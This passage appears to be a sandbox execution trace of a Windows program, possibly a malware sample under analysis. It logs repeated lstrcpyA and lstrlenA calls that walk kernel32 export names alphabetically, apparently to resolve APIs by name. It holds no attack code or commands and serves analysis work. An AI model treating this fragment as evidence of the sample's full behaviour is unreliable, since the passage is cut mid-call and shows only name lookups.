returned="CloseThreadpoolTimer" [0085.803] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0085.803] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0085.803] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0085.803] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0085.803] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0085.804] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0085.804] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0085.804] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0085.804] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0085.804] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0085.804] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0085.804] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0085.804] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0085.804] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0085.804] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0085.804] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0085.804] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0085.804] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0085.804] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0085.804] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0085.804] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0085.804] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0085.804] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0085.804] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0085.804] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0085.804] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0085.804] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0085.804] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0085.804] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0085.804] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0085.804] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0085.804] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0085.804] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0085.804] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0085.804] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0085.804] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0085.804] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0085.804] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0085.804] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0085.804] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0085.804] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0085.804] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0085.805] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0085.805] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0085.805] lstrlenA (lpString="COPYCONTEXT") returned 11 [0085.805] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0085.805] lstrlenA (lpString="COPYFILEA") returned 9 [0085.805] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0085.805] lstrlenA (lpString="COPYFILEEXA") returned 11 [0085.805] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0085.805] lstrlenA (lpString="COPYFILEEXW") returned 11 [0085.805] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0085.805] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0085.805] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0085.805] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0085.805] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0085.805] lstrlenA (lpString="COPYFILEW") returned 9 [0085.805] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0085.805] lstrlenA (lpString="COPYLZFILE") returned 10 [0085.805] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0085.805] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0085.805] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0085.805] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0085.805] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0085.805] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0085.805] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0085.805] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0085.805] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0085.805] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0085.805] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0085.805] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0085.805] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0085.805] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0085.805] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0085.805] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0085.805] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0085.805] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0085.805] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0085.806] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0085.806] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0085.806] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0085.806] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0085.806] lstrlenA (lpString="CREATEEVENTA") returned 12 [0085.806] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0085.806] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0085.806] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0085.806] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0085.806] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0085.806] lstrlenA (lpString="CREATEEVENTW") returned 12 [0085.806] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0085.806] lstrlenA (lpString="CREATEFIBER") returned 11 [0085.806] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0085.806] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0085.806] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0085.806] lstrlenA (lpString="CREATEFILEA") returned 11 [0085.806] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0085.806] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0085.806] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0085.806] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0085.806] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0085.806] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0085.806] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0085.806] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0085.806] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0085.806] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0085.806] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0085.806] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0085.806] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0085.806] lstrlenA (lpString="CREATEFILEW") returned 11 [0085.806] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0085.806] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0085.806] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0085.806] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0085.806] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0085.807] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0085.807] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0085.807] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0085.807] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0085.807] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0085.807] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0085.807] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0085.807] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0085.807] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0085.807] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0085.807] lstrlenA (lpString="CREATEJOBSET") returned 12 [0085.807] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0085.807] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0085.807] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0085.807] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0085.807] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0085.807] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0085.807] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0085.807] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0085.807] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0085.807] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0085.807] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0085.807] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0085.807] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0085.807] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0085.807] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0085.807] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0085.807] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0085.807] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0085.807] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0085.807] lstrlenA (lpString="CREATEPIPE") returned 10 [0085.807] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0085.807] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0085.807] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0085.807] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0085.807] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0085.807] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0085.808] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0085.808] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0085.808] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0085.808] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0085.808] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0085.808] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0085.808] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0085.808] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0085.808] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0085.808] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0085.808] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0085.808] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0085.808] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0085.808] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0085.808] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0085.808] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0085.808] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0085.808] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0085.808] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0085.808] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0085.808] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0085.808] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0085.808] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0085.808] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0085.808] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0085.808] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0085.808] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0085.808] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0085.808] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0085.808] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0085.808] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0085.808] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0085.808] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0085.808] lstrlenA (lpString="CREATETHREAD") returned 12 [0085.808] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0085.809] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0085.809] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0085.809] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0085.809] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0085.809] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0085.809] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0085.809] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0085.809] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0085.809] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0085.809] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0085.809] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0085.809] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0085.809] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0085.809] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0085.809] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0085.809] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0085.809] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0085.809] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0085.809] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0085.809] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0085.809] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0085.809] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0085.809] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0085.809] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0085.809] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0085.809] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0085.809] lstrlenA (lpString="CTRLROUTINE") returned 11 [0085.809] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0085.809] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0085.809] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0085.809] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0085.809] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0085.809] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0085.809] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0085.809] lstrlenA (lpString="DEBUGBREAK") returned 10 [0085.809] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0085.809] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0085.810] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0085.810] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0085.810] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0085.810] lstrlenA (lpString="DECODEPOINTER") returned 13 [0085.810] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0085.810] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0085.810] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0085.810] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0085.810] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0085.810] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0085.810] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0085.810] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0085.810] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0085.810] lstrlenA (lpString="DELETEATOM") returned 10 [0085.810] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0085.810] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0085.810] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0085.810] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0085.810] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0085.810] lstrlenA (lpString="DELETEFIBER") returned 11 [0085.810] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0085.810] lstrlenA (lpString="DELETEFILEA") returned 11 [0085.810] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0085.810] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0085.810] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0085.810] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0085.810] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0085.810] lstrlenA (lpString="DELETEFILEW") returned 11 [0085.810] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0085.810] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0085.810] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0085.810] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0085.810] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0085.810] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0085.811] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0085.811] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0085.811] lstrcpyA (in: lpString1=0x3f2cf70, 